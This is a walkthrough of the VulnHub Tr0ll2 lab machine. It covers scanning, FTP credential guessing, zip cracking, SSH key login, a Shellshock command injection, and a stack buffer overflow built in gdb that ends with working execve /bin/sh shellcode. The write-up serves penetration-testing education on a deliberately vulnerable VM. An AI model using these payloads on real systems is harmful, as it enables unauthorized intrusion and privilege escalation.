Hello Everyone, let's begin
ctf link : https://www.vulnhub.com/entry/tr0ll-2,107/
download link : https://download.vulnhub.com/tr0ll/Tr0ll2.rar
I opened it with Vmware with inteface named vmnet8 (172.16.59.0/24).
Note: Create a snapshot of the machine. You'll need it for sure.
CTF level : Intermediate
Vulnerabilities to exploit : Shellshock, Buffer Overflow
Technique and tools : Nmap, ftp, strings, fcrackzip, Firefox, ssh, shell-storm
Total flags: 1
I found IP using arp-scan
sudo arp-scan --interface vmnet8 --local
I found IP of the ctf machine 172.16.59.151.
I started scanning well-known 1000 ports and banner grabbing using nmap
sudo nmap -sSV 172.16.59.151
I first tried to fuzz ftp service. I saw a message "Only noobs stay for a while..." there. So I tried few login attempts with ctf related terms and I was lucky. I found one
Name : Tr0llAfter logging in, I found a file "lmao.zip". I downloaded that file.
Password : Tr0ll
mget lmao.zip
This zip file is password protected. Let's look into http service, if there's anything interesting.
There's one image. Let's look into robots.txt .
I saw images in few of those links. So I started looking into image and found something intereseting in one image found at this link.
http://172.16.59.151/dont_bother/
strings cat_the_troll.jpg| tail
This message seems to be clue. I just tried it as URIpath.
http://172.16.59.151/y0ur_self/
I downloaded answer.txt . This seems to wordlist.
wget http://172.16.59.151/y0ur_self/answer.txtIt was base64 encoding. I decoded it and also sorted it on the basis of uniqueness.
base64 -d answer.txt |sort -u>troll.listNow I have wordlist and a password protected zip file. Let's bruteforce it. I'm using fcrackzip.
fcrackzip lmao.zip -D -p troll.list -u
Found Password : ItCantReallyBeThisEasyRightLOLThen I extracted zip file using unzip
unzip -P ItCantReallyBeThisEasyRightLOL lmao.zipA file name noob got extracted. I checked filetype using file.
file noob
noob: PEM RSA private keyIt's private key. I should try ssh using the same key. I tried few users related to ctf. And I found that it is "noob" itself. But I see that there is still one problem.
ssh noob@172.16.59.151 -i noob
Is this end?? NO, let's enumerate more. I wanted to know the kernel version. So I tried nmap again with OS scan.
sudo nmap -O 172.16.59.151
This is very old kernel. It might be vulnerable to SHELLSHOCK. I checked it and it was vulnerable to shellshock.
ssh noob@172.16.59.151 -i noob '() { :;}; /bin/bash'
I got shell but it wasn't interactive. I spawned tty shell using python
python -c 'import pty;pty.spawn("/bin/bash");'I kept traversing through directory and i found something interesting in /nothing_to_see_here/choose_wisely.
cd /nothing_to_see_here/choose_wisely
I looked into every folder. There was a executable file "r00t" in every folder. I decide to test door3 first. I ran r00t file and it printed how to use it. But what can we do after all?? Buffer Overflow....right. Let's check If I can exploit kernel stack.
./r00t
Usage: ./r00t input
I tried to input 1000 character and I saw segment fault. This is happy moment. Kernel is exploitable.
Note: If you see your machine started behaving unusual at the time of kernel exploit, restore it to it's initial point.
./r00t $(python -c 'print "A"*1000')
This is time to find offset. I am going to use ./pattern_create.rb and ./pattern_offset.rb. This is metasploit-farmework tool. If you are using Kali, this is already installed in the system.
cd /usr/share/metasploit-framework/tools/exploit
./pattern_create.rb -l 1000
Now I looked for gdb. It was installed. If it wasn't, I would had to fetch it my machine create same environment and write exploit. But becacuse it is already present there, I'll use it.
gdb ./r00t
I ran file with pattern_create.rb output
r [unique pattern from pattern_create.rb]It gave me bits of EIP. Now I have to check the offset (size of buffer+EBP+padding). I used pattern_offset.rb
./pattern_offset.rb -q 0x6a413969
I found out offset size here. Now I have to know ESP, which I tried to get earlier. But I wanted to check if I reduce the payload size, would ESP change? So I fuzzed with 269 byte once again in gdb.
r $(python -c 'print "A"*269')
This time I see different ESP. And it is ovious. The input size is diiferent. I also checked the pointed address of ESP is empty or partially filled. If I send 268 bytes buffer it get filled upto 4 bytes. So I used next stack address 0xbffffb80.
Now its time for payload. I looked into shell-sorm for smallest /bin/sh shell and I found a nice one Linux/x86 - execve /bin/sh shellcode - 23 bytes by Hamza Megahed.
I had offset, ESP and shell payload. Now I had to fuzz for number of NOPs required. So I started with single NOPs and increased in multiple of 2. And I got it working. The final script for privilege escalation:
./r00t $(python -c "print 'A'*268 + '\x80\xfb\xff\xbf' + '\x90' * 4 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'")
Finally found flag.
Comments
Post a Comment